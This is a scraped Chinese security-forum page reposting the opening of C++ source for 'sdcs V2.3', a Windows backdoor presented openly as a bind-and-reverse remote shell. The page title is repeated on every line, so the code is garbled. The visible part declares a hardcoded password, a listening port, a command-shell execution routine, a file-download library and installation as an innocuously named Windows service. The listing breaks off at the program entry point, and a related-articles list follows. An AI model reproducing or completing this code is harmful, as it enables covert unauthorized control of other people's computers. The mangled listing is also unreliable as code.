文章作者:dream2fly
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
sdcs V2.3 exe/dll 正+反弹后门(转)// SmartDoor.cpp : 定义 DLL 应用程序的入口点。
sdcs V2.3 exe/dll 正+反弹后门(转)
//http://www.dream2fly.net/
sdcs V2.3 exe/dll 正+反弹后门(转)
//源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^
sdcs V2.3 exe/dll 正+反弹后门(转)
#include "stdafx.h"
sdcs V2.3 exe/dll 正+反弹后门(转)#include 
"SDdllw.h"
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)#include 
<stdio.h>
sdcs V2.3 exe/dll 正+反弹后门(转)#include 
<stdlib.h>
sdcs V2.3 exe/dll 正+反弹后门(转)#include 
<tchar.h>
sdcs V2.3 exe/dll 正+反弹后门(转)#include 
<string>
sdcs V2.3 exe/dll 正+反弹后门(转)
using namespace::std;
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)#include 
<Shellapi.h>
sdcs V2.3 exe/dll 正+反弹后门(转)#include 
<winsock2.h> 
sdcs V2.3 exe/dll 正+反弹后门(转)#include 
<urlmon.h>
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)#pragma comment (lib,
"ws2_32"
sdcs V2.3 exe/dll 正+反弹后门(转)#pragma comment (lib, 
"urlmon.lib")
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)
void    LogToFile(const char * , int nErrNo = 0) ;            //日志记录 
sdcs V2.3 exe/dll 正+反弹后门(转)

sdcs V2.3 exe/dll 正+反弹后门(转)
#define MAXLINK    5            //客户端连接最大数目
sdcs V2.3 exe/dll 正+反弹后门(转)
#define PASSWORD "dream2fly"    //连接密码 
sdcs V2.3 exe/dll 正+反弹后门(转)u_short g_nPort 
= 12345;            //定义监听端口                    
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)
//#define _REVERSE 1
sdcs V2.3 exe/dll 正+反弹后门(转)

sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)
#define BUFLEN 65535    
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)
bool Passport(SOCKET *csock);
sdcs V2.3 exe/dll 正+反弹后门(转)
void ConnectClient();
sdcs V2.3 exe/dll 正+反弹后门(转)
void ShellServer();
sdcs V2.3 exe/dll 正+反弹后门(转)
//命令行执行函数 
sdcs V2.3 exe/dll 正+反弹后门(转)
DWORD WINAPI ExeCmdShell(LPVOID lp);
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)
#define                    SERVICENAME            "Remote Command Server"
sdcs V2.3 exe/dll 正+反弹后门(转)
#define                    SERVICEDISPLAYNAME    SERVICENAME
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)SC_HANDLE                scm,svc;
sdcs V2.3 exe/dll 正+反弹后门(转)SERVICE_STATUS          ServiceStatus; 
sdcs V2.3 exe/dll 正+反弹后门(转)SERVICE_STATUS_HANDLE  ServiceStatusHandle; 
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)DWORD IsService( BOOL
& );
sdcs V2.3 exe/dll 正+反弹后门(转)
int    InitService();
sdcs V2.3 exe/dll 正+反弹后门(转)
void InstallService();
sdcs V2.3 exe/dll 正+反弹后门(转)
int DeleteSvc();
sdcs V2.3 exe/dll 正+反弹后门(转)
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv);
sdcs V2.3 exe/dll 正+反弹后门(转)
void WINAPI ServiceCtrlHandler(DWORD dwControl);
sdcs V2.3 exe/dll 正+反弹后门(转)
sdcs V2.3 exe/dll 正+反弹后门(转)#ifdef _MYEXE
sdcs V2.3 exe/dll 正+反弹后门(转)
//程序入口 
sdcs V2.3 exe/dll 正+反弹后门(转)
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
#endif

相关文章:

  • 2022-02-25
  • 2021-12-05
  • 2021-11-23
  • 2021-07-30
  • 2022-12-23
  • 2021-09-29
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2021-08-05
  • 2022-12-23
  • 2021-12-28
  • 2021-11-01
  • 2022-12-23
相关资源
相似解决方案